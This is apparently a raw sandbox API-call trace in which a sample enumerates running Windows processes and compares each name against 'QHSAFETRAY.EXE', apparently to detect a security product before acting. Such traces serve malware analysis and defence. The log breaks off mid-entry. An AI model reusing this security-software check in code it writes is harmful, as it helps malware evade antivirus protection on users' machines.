[0162.969] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0162.970] lstrlenW (lpString="[System Process]") returned 16 [0162.970] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0162.970] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="QHSAFETRAY.EXE") returned -1 [0162.970] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0162.974] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0162.974] lstrlenW (lpString="System") returned 6 [0162.974] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0162.974] lstrcmpW (lpString1="SYSTEM", lpString2="QHSAFETRAY.EXE") returned 1 [0162.974] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: 
lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0162.974] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0162.974] lstrlenW (lpString="smss.exe") returned 8 [0162.974] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0162.974] lstrcmpW (lpString1="SMSS.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.974] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.975] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0162.975] lstrlenW (lpString="csrss.exe") returned 9 [0162.975] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0162.975] lstrcmpW (lpString1="CSRSS.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0162.975] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0162.976] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0162.976] lstrlenW (lpString="wininit.exe") returned 11 [0162.976] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0162.976] lstrcmpW (lpString1="WININIT.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.976] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.976] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0162.976] lstrlenW (lpString="csrss.exe") returned 9 [0162.976] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0162.976] lstrcmpW (lpString1="CSRSS.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0162.976] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0162.977] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0162.977] lstrlenW (lpString="winlogon.exe") returned 12 [0162.977] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0162.977] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.977] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0162.978] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0162.978] lstrlenW (lpString="services.exe") returned 12 [0162.978] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0162.978] lstrcmpW (lpString1="SERVICES.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.978] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0162.978] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0162.978] lstrlenW (lpString="lsass.exe") returned 9 [0162.978] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0162.978] lstrcmpW (lpString1="LSASS.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0162.978] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0162.979] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0162.979] lstrlenW (lpString="lsm.exe") returned 7 [0162.979] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0162.979] lstrcmpW (lpString1="LSM.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0162.979] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.980] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.980] lstrlenW (lpString="svchost.exe") returned 11 [0162.980] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.980] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.980] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.980] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.980] lstrlenW (lpString="svchost.exe") returned 11 [0162.980] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.981] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.981] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.981] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.981] lstrlenW (lpString="svchost.exe") returned 11 [0162.981] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.981] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.981] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.982] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.982] lstrlenW (lpString="svchost.exe") returned 11 [0162.982] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.982] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.982] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0162.982] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.982] lstrlenW (lpString="svchost.exe") returned 11 [0162.983] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.983] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.983] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0162.983] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0162.983] lstrlenW (lpString="audiodg.exe") returned 11 [0162.983] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0162.983] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0162.983] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.984] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.984] lstrlenW (lpString="svchost.exe") returned 11 [0162.984] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.984] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.984] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) 
returned 1 [0162.987] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.987] lstrlenW (lpString="svchost.exe") returned 11 [0162.987] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.987] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.987] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0162.988] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0162.988] lstrlenW (lpString="spoolsv.exe") returned 11 [0162.988] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0162.988] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.988] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.989] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.989] lstrlenW (lpString="svchost.exe") returned 11 [0162.989] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.989] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.989] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0162.990] lstrcpyW 
(in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0162.990] lstrlenW (lpString="taskhost.exe") returned 12 [0162.990] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0162.990] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.990] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0162.991] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0162.991] lstrlenW (lpString="taskeng.exe") returned 11 [0162.991] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0162.991] lstrcmpW (lpString1="TASKENG.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.991] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0162.991] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0162.991] lstrlenW (lpString="dwm.exe") returned 7 [0162.992] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0162.992] lstrcmpW (lpString1="DWM.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0162.992] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0162.992] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: 
lpString1="explorer.exe") returned="explorer.exe" [0162.992] lstrlenW (lpString="explorer.exe") returned 12 [0162.992] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0162.992] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0162.992] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0162.993] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0162.993] lstrlenW (lpString="taskeng.exe") returned 11 [0162.993] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0162.993] lstrcmpW (lpString1="TASKENG.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.994] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0162.995] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0162.995] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0162.995] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0162.995] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0162.995] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0162.997] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: 
lpString1="taskhost.exe") returned="taskhost.exe" [0162.998] lstrlenW (lpString="taskhost.exe") returned 12 [0162.998] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0162.998] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.998] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.003] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.003] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.003] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.003] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.004] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.005] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.005] lstrlenW (lpString="tri.exe") returned 7 [0163.005] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.006] lstrcmpW (lpString1="TRI.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.006] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.008] lstrcpyW (in: 
lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.008] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.008] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.008] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.009] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.010] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.010] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.010] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.011] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.011] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.013] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.013] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.013] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.013] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.013] 
Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.013] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.013] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.014] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.014] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.014] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.014] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.014] lstrlenW (lpString="isolation.exe") returned 13 [0163.015] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.015] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.015] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.017] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.017] lstrlenW (lpString="abc.exe") returned 7 [0163.017] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.017] lstrcmpW (lpString1="ABC.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.017] Process32NextW (in: 
hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.017] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.017] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.017] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.017] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.017] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.018] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.018] lstrlenW (lpString="english_performing.exe") returned 22 [0163.018] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.018] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.018] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.019] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.019] 
